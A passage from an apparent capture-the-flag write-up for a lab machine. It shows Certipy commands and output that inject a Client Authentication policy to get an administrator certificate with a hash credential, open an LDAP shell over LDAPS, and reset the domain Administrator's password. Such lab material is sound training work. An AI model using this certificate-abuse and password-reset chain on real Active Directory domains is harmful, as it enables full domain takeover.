Step 1: Request a certificate, injecting "Client Authentication" Application Policy and target UPN.

└─$ certipy req -u 'cert_admin@tombwatcher.htb' -hashes :f87ebf0febd9c4095c68a88928755773 -dc-ip 10.129.13.255 -target 'tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -upn 'administrator@tombwatcher.htb' -sid 'S-1-5-21-1392491010-1358638721-2126982587-500' -application-policies 'Client Authentication'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 3
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@tombwatcher.htb'
[*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Step 2: Authenticate via Schannel (LDAPS) using the obtained certificate.

└─$ certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.13.255' -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@tombwatcher.htb'
[*]     SAN URL SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*]     Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Connecting to 'ldaps://10.129.13.255:636'
[*] Authenticated to '10.129.13.255' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands

# 

Let's change the Administrator password from the LDAP shell:

# change_password Administrator P@ssw0rd@123
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: P@ssw0rd@123
Password changed successfully!

# 

And we are in as Administrator and get root.txt.
